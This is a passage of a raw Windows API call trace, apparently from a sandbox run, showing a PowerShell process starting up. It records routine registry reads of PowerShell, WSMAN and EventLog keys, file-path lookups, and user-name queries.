	[0510.765] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cfe0 | out: lpFileInformation=0x14cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0510.766] SetErrorMode (uMode=0x1) returned 0x1
	[0510.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0510.766] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0c8 | out: phkResult=0x14d0c8*=0x320) returned 0x0
	[0510.766] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d04c, lpData=0x0, lpcbData=0x14d048*=0x0 | out: lpType=0x14d04c*=0x1, lpData=0x0, lpcbData=0x14d048*=0x56) returned 0x0
	[0510.766] CoTaskMemAlloc (cb=0x5a) returned 0x3ce5c0
	[0510.766] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d01c, lpData=0x3ce5c0, lpcbData=0x14d018*=0x56 | out: lpType=0x14d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d018*=0x56) returned 0x0
	[0510.766] CoTaskMemFree (pv=0x3ce5c0) 
	[0510.766] RegCloseKey (hKey=0x320) returned 0x0
	[0510.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0510.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0510.767] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xd6ea6b52, Data2=0xc820, Data3=0x4445, Data4=([0]=0x8d, [1]=0x82, [2]=0x20, [3]=0x7c, [4]=0xeb, [5]=0xf, [6]=0x1b, [7]=0x40))) returned 0x0
	[0510.767] CoCreateGuid (in: pguid=0x14d2f0 | out: pguid=0x14d2f0*(Data1=0xa13752a8, Data2=0xa51, Data3=0x449d, Data4=([0]=0x99, [1]=0xcf, [2]=0x4c, [3]=0x92, [4]=0x53, [5]=0x82, [6]=0xb1, [7]=0xb6))) returned 0x0
	[0510.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0510.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0511.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0511.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0512.048] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.048] CoTaskMemFree (pv=0x3ada70) 
	[0512.049] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.050] CoTaskMemFree (pv=0x3ada70) 
	[0512.051] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.051] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.051] CoTaskMemFree (pv=0x3ada70) 
	[0512.053] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.053] CoTaskMemFree (pv=0x3ada70) 
	[0512.066] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.066] CoTaskMemFree (pv=0x3ada70) 
	[0512.067] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.067] CoTaskMemFree (pv=0x3ada70) 
	[0512.067] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0512.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.068] CoTaskMemFree (pv=0x3ada70) 
	[0512.072] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2d8 | out: phkResult=0x14d2d8*=0x320) returned 0x0
	[0512.686] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d1dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d1d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0512.686] CoTaskMemFree (pv=0x0) 
	[0512.687] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0512.687] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x1b959c50, lpcchValueName=0x14d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0512.688] CoTaskMemFree (pv=0x1b959c50) 
	[0512.688] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0512.688] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x1b959c50, lpcchValueName=0x14d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0512.688] CoTaskMemFree (pv=0x1b959c50) 
	[0512.688] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0512.688] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x1b959c50, lpcchValueName=0x14d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0512.688] CoTaskMemFree (pv=0x1b959c50) 
	[0512.688] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d26c, lpData=0x0, lpcbData=0x14d268*=0x0 | out: lpType=0x14d26c*=0x1, lpData=0x0, lpcbData=0x14d268*=0x8) returned 0x0
	[0512.688] CoTaskMemAlloc (cb=0xc) returned 0x3d1400
	[0512.688] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d23c, lpData=0x3d1400, lpcbData=0x14d238*=0x8 | out: lpType=0x14d23c*=0x1, lpData="2.0", lpcbData=0x14d238*=0x8) returned 0x0
	[0512.689] CoTaskMemFree (pv=0x3d1400) 
	[0513.348] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d228 | out: phkResult=0x14d228*=0x320) returned 0x0
	[0513.348] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d12c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d128*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0513.348] CoTaskMemFree (pv=0x0) 
	[0513.348] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0513.348] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x1b959c50, lpcchValueName=0x14d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0513.348] CoTaskMemFree (pv=0x1b959c50) 
	[0513.348] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0513.348] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x1b959c50, lpcchValueName=0x14d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0513.348] CoTaskMemFree (pv=0x1b959c50) 
	[0513.348] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0513.348] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x1b959c50, lpcchValueName=0x14d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0513.348] CoTaskMemFree (pv=0x1b959c50) 
	[0513.348] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d1bc, lpData=0x0, lpcbData=0x14d1b8*=0x0 | out: lpType=0x14d1bc*=0x1, lpData=0x0, lpcbData=0x14d1b8*=0x8) returned 0x0
	[0513.348] CoTaskMemAlloc (cb=0xc) returned 0x3d1220
	[0513.348] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d18c, lpData=0x3d1220, lpcbData=0x14d188*=0x8 | out: lpType=0x14d18c*=0x1, lpData="2.0", lpcbData=0x14d188*=0x8) returned 0x0
	[0513.348] CoTaskMemFree (pv=0x3d1220) 
	[0513.350] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0513.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0513.350] CoTaskMemFree (pv=0x3ada70) 
	[0514.604] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0514.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.604] CoTaskMemFree (pv=0x3ada70) 
	[0514.610] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d258 | out: phkResult=0x14d258*=0x2d8) returned 0x0
	[0514.614] RegQueryInfoKeyW (in: hKey=0x2d8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.615] CoTaskMemFree (pv=0x0) 
	[0514.615] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.615] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x0, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.616] CoTaskMemFree (pv=0x1b959c50) 
	[0514.616] CoTaskMemFree (pv=0x0) 
	[0514.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.616] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x1, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.616] CoTaskMemFree (pv=0x1b959c50) 
	[0514.616] CoTaskMemFree (pv=0x0) 
	[0514.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.616] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x2, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.616] CoTaskMemFree (pv=0x1b959c50) 
	[0514.616] CoTaskMemFree (pv=0x0) 
	[0514.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.616] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x3, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.616] CoTaskMemFree (pv=0x1b959c50) 
	[0514.616] CoTaskMemFree (pv=0x0) 
	[0514.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.616] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x4, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.616] CoTaskMemFree (pv=0x1b959c50) 
	[0514.616] CoTaskMemFree (pv=0x0) 
	[0514.616] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.616] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x5, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.617] CoTaskMemFree (pv=0x1b959c50) 
	[0514.617] CoTaskMemFree (pv=0x0) 
	[0514.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.617] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x6, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.617] CoTaskMemFree (pv=0x1b959c50) 
	[0514.617] CoTaskMemFree (pv=0x0) 
	[0514.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.617] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x7, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.617] CoTaskMemFree (pv=0x1b959c50) 
	[0514.617] CoTaskMemFree (pv=0x0) 
	[0514.617] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0514.617] RegEnumKeyExW (in: hKey=0x2d8, dwIndex=0x8, lpName=0x1b959c50, lpcchName=0x14d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0514.617] CoTaskMemFree (pv=0x1b959c50) 
	[0514.617] CoTaskMemFree (pv=0x0) 
	[0514.617] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x300) returned 0x0
	[0514.617] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.617] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x1c8) returned 0x0
	[0514.617] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.618] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x324) returned 0x0
	[0514.618] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.618] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x328) returned 0x0
	[0514.618] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.618] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x32c) returned 0x0
	[0514.618] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.618] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x330) returned 0x0
	[0514.618] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.619] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x334) returned 0x0
	[0514.619] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.619] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x338) returned 0x0
	[0514.619] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x0) returned 0x2
	[0514.619] RegOpenKeyExW (in: hKey=0x2d8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x33c) returned 0x0
	[0514.619] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2b8 | out: phkResult=0x14d2b8*=0x340) returned 0x0
	[0514.619] RegCloseKey (hKey=0x340) returned 0x0
	[0514.619] RegCloseKey (hKey=0x2d8) returned 0x0
	[0514.620] RegCloseKey (hKey=0x33c) returned 0x0
	[0514.635] CoTaskMemAlloc (cb=0x804) returned 0x1b974c30
	[0514.635] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b974c30, nSize=0x14d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d4c8) returned 0x1
	[0516.010] CoTaskMemFree (pv=0x1b974c30) 
	[0516.011] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0516.011] GetUserNameW (in: lpBuffer=0x1b959c50, pcbBuffer=0x14d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d508) returned 1
	[0516.011] CoTaskMemFree (pv=0x1b959c50) 
	[0517.610] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x344) returned 0x0
	[0517.610] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.610] CoTaskMemFree (pv=0x0) 
	[0517.610] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.610] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.610] CoTaskMemFree (pv=0x1b959c50) 
	[0517.610] CoTaskMemFree (pv=0x0) 
	[0517.610] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.610] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.610] CoTaskMemFree (pv=0x1b959c50) 
	[0517.611] CoTaskMemFree (pv=0x0) 
	[0517.611] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.611] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.611] CoTaskMemFree (pv=0x1b959c50) 
	[0517.611] CoTaskMemFree (pv=0x0) 
	[0517.611] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.611] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.611] CoTaskMemFree (pv=0x1b959c50) 
	[0517.611] CoTaskMemFree (pv=0x0) 
	[0517.611] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.611] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.611] CoTaskMemFree (pv=0x1b959c50) 
	[0517.611] CoTaskMemFree (pv=0x0) 
	[0517.611] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.611] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.611] CoTaskMemFree (pv=0x1b959c50) 
	[0517.611] CoTaskMemFree (pv=0x0) 
	[0517.611] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
	[0517.612] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x1b959c50, lpcchName=0x14d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0517.612] CoTaskMemFree (pv=0x1b959c50) 
	[0517.612] CoTaskMemFree (pv=0x0) 
	[0517.612] CoTaskMemAlloc (cb=0x204) returned 0x1b959c50
